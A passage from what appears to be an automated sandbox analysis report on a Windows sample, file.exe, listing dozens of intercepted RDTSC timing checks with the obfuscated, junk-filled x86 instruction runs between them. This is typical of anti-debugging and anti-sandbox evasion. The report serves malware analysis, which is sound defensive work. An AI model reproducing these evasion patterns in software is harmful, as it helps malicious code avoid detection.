00007FDD5537C43Eh 0x00000068 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 102528F second address: 1025293 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1025293 second address: 1025299 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1025299 second address: 10252B3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FDD5513FC26h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10252B3 second address: 10252B7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 102548A second address: 10254B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 popad 0x00000006 push eax 0x00000007 jmp 00007FDD5513FC1Fh 0x0000000c xchg eax, esi 0x0000000d jno 00007FDD5513FC1Ch 0x00000013 push eax 0x00000014 push eax 0x00000015 push edx 0x00000016 jno 00007FDD5513FC18h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1025542 second address: 1025546 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1025B05 second address: 1025B6B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 jno 00007FDD5513FC2Ch 0x0000000c nop 0x0000000d push 00000000h 0x0000000f push esi 0x00000010 call 00007FDD5513FC18h 0x00000015 pop esi 0x00000016 mov dword ptr [esp+04h], esi 0x0000001a add dword ptr [esp+04h], 00000015h 0x00000022 inc esi 0x00000023 push esi 0x00000024 ret 0x00000025 pop esi 0x00000026 ret 0x00000027 push 0000001Eh 0x00000029 mov ecx, eax 0x0000002b nop 0x0000002c jmp 00007FDD5513FC29h 0x00000031 push eax 0x00000032 push eax 0x00000033 push edx 0x00000034 pushad 0x00000035 pushad 0x00000036 popad 0x00000037 push eax 0x00000038 push edx 0x00000039 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1025B6B second address: 1025B70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1025C99 second address: 1025CAD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FDD5513FC1Fh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1025ECC second address: 1025ED0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1025ED0 second address: 1025EE4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDD5513FC20h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1025FBD second address: 1025FDC instructions: 0x00000000 rdtsc 0x00000002 jns 00007FDD5537C436h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FDD5537C443h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1025FDC second address: 100E098 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 jc 00007FDD5513FC2Bh 0x0000000e push ebx 0x0000000f jmp 00007FDD5513FC23h 0x00000014 pop ebx 0x00000015 nop 0x00000016 push 00000000h 0x00000018 push ebx 0x00000019 call 00007FDD5513FC18h 0x0000001e pop ebx 0x0000001f mov dword ptr [esp+04h], ebx 0x00000023 add dword ptr [esp+04h], 00000019h 0x0000002b inc ebx 0x0000002c push ebx 0x0000002d ret 0x0000002e pop ebx 0x0000002f ret 0x00000030 jbe 00007FDD5513FC19h 0x00000036 or dh, FFFFFFF1h 0x00000039 call dword ptr [ebp+122D35C6h] 0x0000003f jmp 00007FDD5513FC20h 0x00000044 pushad 0x00000045 push eax 0x00000046 push edx 0x00000047 je 00007FDD5513FC16h 0x0000004d push eax 0x0000004e push edx 0x0000004f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1024DA6 second address: 1024DAA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1024DAA second address: 100D51E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 nop 0x00000007 push 00000000h 0x00000009 push ecx 0x0000000a call 00007FDD5513FC18h 0x0000000f pop ecx 0x00000010 mov dword ptr [esp+04h], ecx 0x00000014 add dword ptr [esp+04h], 00000015h 0x0000001c inc ecx 0x0000001d push ecx 0x0000001e ret 0x0000001f pop ecx 0x00000020 ret 0x00000021 cmc 0x00000022 movzx edi, bx 0x00000025 lea eax, dword ptr [ebp+12489AE5h] 0x0000002b sub dword ptr [ebp+122D2EABh], edx 0x00000031 nop 0x00000032 push eax 0x00000033 push esi 0x00000034 pushad 0x00000035 popad 0x00000036 pop esi 0x00000037 pop eax 0x00000038 push eax 0x00000039 jmp 00007FDD5513FC24h 0x0000003e nop 0x0000003f mov edi, 5E636700h 0x00000044 or dx, 0613h 0x00000049 call dword ptr [ebp+122D1CE2h] 0x0000004f push eax 0x00000050 push edx 0x00000051 push edi 0x00000052 pushad 0x00000053 popad 0x00000054 pushad 0x00000055 popad 0x00000056 pop edi 0x00000057 jmp 00007FDD5513FC1Eh 0x0000005c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1068B92 second address: 1068BA1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jbe 00007FDD5537C436h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1068BA1 second address: 1068BAD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jng 00007FDD5513FC16h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1068BAD second address: 1068BB3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1068BB3 second address: 1068BBD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FDD5513FC16h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1068BBD second address: 1068BDE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FDD5537C445h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1068BDE second address: 1068BE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1068BE2 second address: 1068BE6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1068D4D second address: 1068D53 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 106903C second address: 1069043 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 106ED32 second address: 106ED38 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 106ED38 second address: 106ED4C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDD5537C43Ah 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 106ED4C second address: 106ED50 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 106ED50 second address: 106ED54 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 106ED54 second address: 106ED5A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 106ED5A second address: 106ED79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push ebx 0x0000000a jmp 00007FDD5537C43Ah 0x0000000f jo 00007FDD5537C436h 0x00000015 pop ebx 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 106ED79 second address: 106ED7D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 106ED7D second address: 106ED81 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10718E4 second address: 1071918 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jno 00007FDD5513FC16h 0x00000009 jp 00007FDD5513FC16h 0x0000000f jl 00007FDD5513FC16h 0x00000015 jmp 00007FDD5513FC29h 0x0000001a popad 0x0000001b push ebx 0x0000001c push edx 0x0000001d pop edx 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1071A6B second address: 1071A87 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDD5537C448h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1071A87 second address: 1071ACE instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 pop eax 0x00000005 pop edx 0x00000006 pushad 0x00000007 jmp 00007FDD5513FC26h 0x0000000c push edi 0x0000000d pop edi 0x0000000e pushad 0x0000000f popad 0x00000010 popad 0x00000011 pop edx 0x00000012 pop eax 0x00000013 jc 00007FDD5513FC3Dh 0x00000019 jbe 00007FDD5513FC25h 0x0000001f push eax 0x00000020 push edx 0x00000021 jnc 00007FDD5513FC16h 0x00000027 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1071ACE second address: 1071AD2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1071C1C second address: 1071C20 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1071D9A second address: 1071DAC instructions: 0x00000000 rdtsc 0x00000002 jne 00007FDD5537C438h 0x00000008 push eax 0x00000009 push edx 0x0000000a jnp 00007FDD5537C436h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1071DAC second address: 1071DB6 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FDD5513FC16h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10259CF second address: 10259EB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDD5537C448h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10259EB second address: 10259F0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10259F0 second address: 1025A2F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push edx 0x0000000d call 00007FDD5537C438h 0x00000012 pop edx 0x00000013 mov dword ptr [esp+04h], edx 0x00000017 add dword ptr [esp+04h], 00000018h 0x0000001f inc edx 0x00000020 push edx 0x00000021 ret 0x00000022 pop edx 0x00000023 ret 0x00000024 mov edx, dword ptr [ebp+122D324Eh] 0x0000002a push 00000004h 0x0000002c mov ecx, dword ptr [ebp+122D2FFEh] 0x00000032 nop 0x00000033 push eax 0x00000034 push edx 0x00000035 push esi 0x00000036 push edi 0x00000037 pop edi 0x00000038 pop esi 0x00000039 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1078BC0 second address: 1078BC4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 107C212 second address: 107C222 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 js 00007FDD5537C43Ah 0x0000000c push esi 0x0000000d pop esi 0x0000000e push edi 0x0000000f pop edi 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 107C222 second address: 107C22E instructions: 0x00000000 rdtsc 0x00000002 jo 00007FDD5513FC1Eh 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 107C22E second address: 107C237 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 107FFBB second address: 107FFC4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 108059C second address: 10805A5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1088F8D second address: 1088F97 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FDD5513FC1Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1086FD6 second address: 1086FEE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FDD5537C441h 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1086FEE second address: 108702B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FDD5513FC22h 0x00000009 jl 00007FDD5513FC16h 0x0000000f popad 0x00000010 push eax 0x00000011 jmp 00007FDD5513FC1Eh 0x00000016 pop eax 0x00000017 popad 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007FDD5513FC1Dh 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1087864 second address: 1087871 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jc 00007FDD5537C436h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1087871 second address: 1087888 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDD5513FC23h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1087888 second address: 108788E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1087E30 second address: 1087E36 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1087E36 second address: 1087E3B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 108812A second address: 108812E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10886C9 second address: 10886E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 je 00007FDD5537C442h 0x0000000f jnc 00007FDD5537C436h 0x00000015 jc 00007FDD5537C436h 0x0000001b pushad 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 108CE85 second address: 108CE90 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007FDD5513FC16h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 108CE90 second address: 108CE95 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 108CE95 second address: 108CED1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jp 00007FDD5513FC2Ah 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 push ecx 0x00000011 pop ecx 0x00000012 jno 00007FDD5513FC16h 0x00000018 popad 0x00000019 jmp 00007FDD5513FC1Fh 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 108CED1 second address: 108CEDC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jp 00007FDD5537C436h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 108CEDC second address: 108CEE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 108CEE2 second address: 108CEFE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FDD5537C445h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 108C084 second address: 108C08A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 108C08A second address: 108C099 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FDD5537C436h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 108C34C second address: 108C352 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 108C352 second address: 108C356 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 108C4A5 second address: 108C4AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 108C4AD second address: 108C4B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 108C4B2 second address: 108C4B7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 108C4B7 second address: 108C4BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 108C4BD second address: 108C4C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 108C7B3 second address: 108C7D7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDD5537C441h 0x00000007 jnc 00007FDD5537C436h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push ebx 0x00000010 push eax 0x00000011 push edx 0x00000012 jbe 00007FDD5537C436h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 108CA70 second address: 108CA7A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FDD5513FC16h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 108CA7A second address: 108CA95 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007FDD5537C43Fh 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 108CA95 second address: 108CA99 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1099A7B second address: 1099A85 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1099A85 second address: 1099A89 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1099A89 second address: 1099A9B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDD5537C43Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1099A9B second address: 1099AA1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1097CAC second address: 1097CB2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1097CB2 second address: 1097CB6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1097DE8 second address: 1097DF0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 109832D second address: 1098344 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 jbe 00007FDD5513FC16h 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f push esi 0x00000010 pop esi 0x00000011 jp 00007FDD5513FC16h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1098344 second address: 1098356 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jmp 00007FDD5537C43Ch 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1098519 second address: 109852C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 jno 00007FDD5513FC16h 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 109852C second address: 1098530 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1098530 second address: 1098534 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1098534 second address: 1098554 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FDD5537C447h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10991F4 second address: 10991FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10ADACE second address: 10ADAD2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10ADAD2 second address: 10ADAEC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDD5513FC26h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10AD692 second address: 10AD6A4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 ja 00007FDD5537C436h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push edi 0x0000000f pop edi 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
